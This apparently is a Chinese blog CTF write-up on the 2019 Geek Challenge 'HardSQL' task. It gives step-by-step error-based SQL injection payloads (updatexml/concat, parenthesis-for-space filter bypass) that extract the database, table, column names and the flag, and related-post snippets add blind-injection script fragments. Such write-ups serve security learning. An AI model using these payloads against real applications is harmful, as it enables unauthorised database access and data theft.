从2019极客大挑战sql题看sql注入(续)

已于 2022-04-09 20:32:47 修改
阅读量3.4k 收藏 1
点赞数 2
分类专栏: ctf记录 文章标签: 开发语言
于 2022-04-09 20:32:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limenzzz/article/details/124065572
版权

书接上回,2019极挑还有两题较难的sql注入(虽然对大佬来说非常简单),想借此来记录自己不太会的题目_(:з」∠)_

目录

1.hardsql

1.1尝试爆库

 1.2尝试爆表

 1.3爆字段

 1.4爆破字段内容

2finalsql

3.总结

 附言

1.hardsql

尝试union,万能钥匙,order by 都失败。于是看了一下大佬的题解,得知是报错注入(报错注入和时间注入确实不太会)

 这里附上学习地址

报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例_士别三日wyx的博客-CSDN博客

1.1尝试爆库

payload 

?username=1%27or%28updatexml%281,concat(0x7e,database(),0x7e),1))%23&password=1221

 

 1.2尝试爆表

payload

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1221

 1.3爆字段

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=1221

 1.4爆破字段内容

payload 

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(id,0x3e,username,0x3e,password))from(geek.H4rDsq1)),0x7e),1))%23&password=1221

 

发现只有一半,看了大佬wp后发现要用right()和left()。于是再次构建payload

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(geek.H4rDsq1)),0x7e),1))%23&password=1221

 拼合得到flag、

flag{d53789d2-7e69-4958-a9ab-583500b2ec0d}

2finalsql

布尔盲注,还得跑代码就涉及知识盲区了,在这里就只挂个大佬的wp,等以后技术娴熟了再回头来试试。

BUUCTF [极客大挑战 2019]FinalSQL_Chu_Jian_JX的博客-CSDN博客_buuctf finalsql

3.总结

感觉自己不太会的就是布尔盲注,时间注入,报错注入。

其中布尔盲注只能看运气,sqlmap可以辅助但还是有不懂的地方。时间注入基本没做到过题目(还得再刷)。报错注入做过几道题目但还不熟。

在有绕过的情况下,要非常注意括号数量一不小心就会多几个或少几个。还有一般的查询语句不要搞错,手注特别容易打错data->date 这些。。。。

在对付过滤的时候有些知识是必备的在这附上一个链接,方便以后面对过滤时有办法应对。

SQL注入一些过滤及绕过总结_obsetear的博客-CSDN博客_sql注入关键字过滤绕过

 附言

接下来还得总结一下文件传输题目和伪协议,代码审计等。当然sql其实也只会了一点基础Orz。

希望自己不要这么菜了。。。。。

L1men2
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[极客挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 416
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
2019极客挑战sqlsql注入
limenzzz的博客
04-07 1876
学了一段时间ctf后发现自己的基础还不是很扎实,于是打算记录一下学习过程,方便以后查看(归根结底还是太菜了_(:з」∠)_) 目录 1.easysql 2.babysql 1.easysql 直接使用万能密码发现语法出错,仔细看是引号要求双引号闭合(我是菜狗),闭合后输入得到flag。 另外附上常见万能密码表,防止以后出现过滤不知道怎么办。 sql注入之万能密码总结_無名之涟的博客-CSDN博客_sql万能密码 2.babysql ...
[极客挑战2019] hard sql
qq_52907838的博客
05-10 170
经过开始的测试,输入1'报错,输入1' or 1=1#没用,输入1'or'显示密码错误,可以发现空格被过滤 进一步测试发现and,union也被过滤,于是想到用报错注入 则考虑用()绕过空格过滤,构造payload: 1'or(updatexml(1,concat(0x7e,database(),0x7e),0))# 可以得到数据库名:geek 第二部构造payload: 1'or(updatexml(1,concat(0x7e,(select(table_name)from(informati
[极客挑战 2019]LoveSQL
qq_42404383的博客
08-10 354
文章目录[极客挑战 2019]LoveSQL目:**分析:**解:总结: [极客挑战 2019]LoveSQL 目: 存在注入点 分析: 手动注入、尝试 ’ or 1 = 1; # 得到账户密码 admin cc084c3d58c1ecc212d9b4ff3f84aa4c 登录后还是没有我们想要的东西,所以现在就是要利用SQL注入从而获取表里数据 解: 接下来就是按sql注入的流程操作: 1.测试有多少字段 使用order by 字段数为3 2.爆出当前数据库名和身
极客挑战2019】love sql详解
kindyyy的博客
04-16 1466
这道其实是最基本的sql注入类型,所以只要掌握最基础的注入知识很容易就可以得到flag 先打开目,先用万能密码登陆一下 只是一个乱码啊,没什么用,就直接用sql注入了,先查询列数: 1' order by 3 # 有回显,那再尝试一下4? ' order by 4 # 那就只有3列,查询库名吧,直接上 ...
汽车品牌车系车型sql数据库.zip
09-01
汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库.zip汽车品牌车系车型sql数据库....
浅谈一次与sql注入 & webshell 的美丽“邂逅”
01-19
sql注入与“她”相遇 某一天,天气晴朗,心情舒畅。“她”来了,打破了笔者的美好时光。下午2点多钟,笔者和朋友在苏州街的天使汇二楼极客咖啡参加某个云厂商的Kubernetes一场技术沙龙,正听得兴致勃勃的时候,笔者...
Java开发关爱留守儿童网站源码+sql数据库.zip
08-21
Java开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql数据库.zipJava开发关爱留守儿童网站源码+sql...
基于java的小区楼宇管理系统源码+sql数据库+说明.zip
08-29
基于java的小区楼宇管理系统源码+sql数据库+说明.zip基于java的小区楼宇管理系统源码+sql数据库+说明.zip基于java的小区楼宇管理系统源码+sql数据库+说明.zip基于java的小区楼宇管理系统源码+sql数据库+说明.zip基于...
SQL的概要介绍与分析
最新发布
04-26
此外,还有诸如慕课网、极客时间等知名的在线教育平台,提供了从入门到精通的SQL课程,帮助学习者系统地掌握SQL的各个方面。 最后,SQL的社区也非常活跃。在这个社区中,开发者们可以交流经验、分享技巧、解决问...
极客挑战2019-SQL注入PW
cainsoftware的博客
09-23 1277
01、[极客挑战2019]EasysQL 02、[极客挑战2019]LovesQL 03、[极客挑战2019]BabysQL 04、[极客挑战2019]HardsQL 05、[极客挑战2019]FinalsQL Pass-01 第一无须太多花里胡哨的直接就是万能密码 payload:admin' or 1=1 -- qwe Pass-02 目提示 不在当前表 直接先用万能密码测试闭合 提示登录成功 说明闭合是没有问的 那么下面就是判断其他...
[极客挑战 2019]EasySQL
qq_52431855的博客
05-31 252
首先尝试注入发现是字符型注入。并且后台两个双引号闭合的 "" 然后尝试万能密码 1' or '1'='1 成功登录
web buuctf [极客挑战 2019]FinalSQL
weixin_44214568的博客
04-08 1123
知识点:盲注 1.开 最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注 2.随便点个12345,用bp抓包,进行fuzz 报错盲注,贴脚本 # -*- coding: utf-8 -*- # @Author: jiaoben # @Date : 2020/05/03 import re import requests import string url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd..
[极客挑战 2019]FinalSQL
06-10 71
目提示盲注,根据他的指点走,肯定是没有办法获取到flag的,但是经过一顿fuzz之后,知道空格、=都被过滤了。但我们可以用()代替空格,使用like代替=。 使用xia'mi /search.php?id=1^0
[极客挑战 2019]FinalSQL1 wp
m0_55185160的博客
08-06 218
我们打开网页,用admin和'1去试 结果给我们返回的报错为 于是我再次输入admin ,passward进行登录结果报错还是一样, 之后把admin改* 结果报错信息还是一,样, 又因为本为fianlSQL,可能存在盲注。 于是借助了大佬的脚本, import requests url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php' flag = '' for i in range(1,250)
[极客挑战 2019]EasySQL 1 sqlmap
08-13
你好!关于极客挑战 2019中的EasySQL 1sqlmap是一款常用于自动化SQL注入检测和利用的工具。它可以通过发送恶意的SQL语句来探测和利用存在SQL注入漏洞的Web应用程序。 在EasySQL 1中,你可能需要使用sqlmap来检测和利用目标网站上的SQL注入漏洞。首先,你需要下载并安装sqlmap工具。然后,通过运行sqlmap命令,并指定目标URL和其他必要参数,来进行自动化的注入检测和利用。 请注意,在进行任何安全测试之前,确保已经获得了合法的授权,并且仅在授权范围内进行测试。安全测试应该始终遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值